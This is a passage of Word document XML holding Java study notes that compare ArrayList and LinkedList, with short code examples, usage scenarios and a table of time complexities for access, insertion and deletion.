      </w:r>
    </w:p>
    <w:p w14:paraId="47A98276" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ons/Deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insertions at the end are generally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but insertions/deletions in the middle can be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because shifting elements is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFECBFF" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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 Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need a resizable list and need fast access to elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4DB63" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C1586F" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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add(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A4A47" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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add(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB06939" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C18B0C" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ynamic Size</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is also part of the Java Collections Framework and does not have a fixed size. It can grow or shrink dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31000EF2" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It uses nodes where each node stores the data and references to the next and previous nodes in the list (doubly linked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4A2D9B" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ype</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can store any type of object, similar to ArrayList but using a different internal structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC48F64" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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 Time</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Linear time (O(n))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing elements by index, as it requires traversing the list from the head or tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDC160" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ons/Deletions</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Efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for insertions and deletions at the beginning or middle of the list since only the references need to be changed. Operations are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if you already have a reference to the node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B055BF" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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 Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you frequently need to add or remove elements from the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D63A02" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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nkedList&lt;Integer&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C2C5A" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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add(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE596E" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="216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addFirst(5);  // Adds at the beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679978B" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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to Use ArrayList vs. LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B78D61" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7B2EF" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (constant time) to elements using an index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758357F" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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number of elements is not known in advance but will likely grow or shrink frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09053A" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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mostly need to add or remove elements from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list (amortized O(1) for add).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1A75D6" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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don’t need to insert or remove elements frequently from the middle or beginning, as those operations can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(n) for shifting elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61275E91"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 Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E63D9FC" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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is great for scenarios where you need to access elements by index frequently, such as in applications where you need to display or manipulate a list of items, like a list of search results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE7550" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD72C98" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD69557" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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don't need fast random access by index, as accessing an element by index in a LinkedList can be slower (O(n)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022C0772" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</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stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementation, since LinkedList implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deque</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface, allowing you to add and remove elements from both ends efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2655E9" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not a primary concern since a linked list requires additional memory for the references in each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBAC003"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 Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6500F1" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is perfect for scenarios like implementing queues, deques, or maintaining a collection where elements need to be inserted or removed frequently from the head or tail, like a task scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE1ECD4" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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erformanc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56"/>
        <w:gridCol w:w="563"/>
        <w:gridCol w:w="874"/>
        <w:gridCol w:w="2114"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="7CE372A4" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39473B3C" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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peration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB84BCD" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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rray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="454103F7" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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rrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A41E462" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="349EB958" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB20520"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andom Access (by index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="147B66BB"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D20E00F"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51408E44"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="17CF2BB9" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48393B5C"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on at End</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56A722D2"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64EFA96E"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5943C451"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="6675A22E" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01CD18F3"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on at Beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3442D35B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02B322EE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4FB8EA"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="60AF06F9" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DB9FE5"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on in Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0991DE39"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C06F5DE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72131239"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1) (if node is known)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="3E7FA77C" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35AB5872"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letion at End</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="096CED07"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CDD054"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CBDF57E"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="57312ABC" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4249092D"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letion at Beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F1E7FB"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="095D397D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="587337D1"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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5CFE" w:rsidRPr="00CE4B95" w14:paraId="48B8A280" w14:textId="77777777" w:rsidTr="00FC7EFA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14415806"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letion in Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DA9CF9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C4B82D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FDA6746" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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1) (if node is known)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
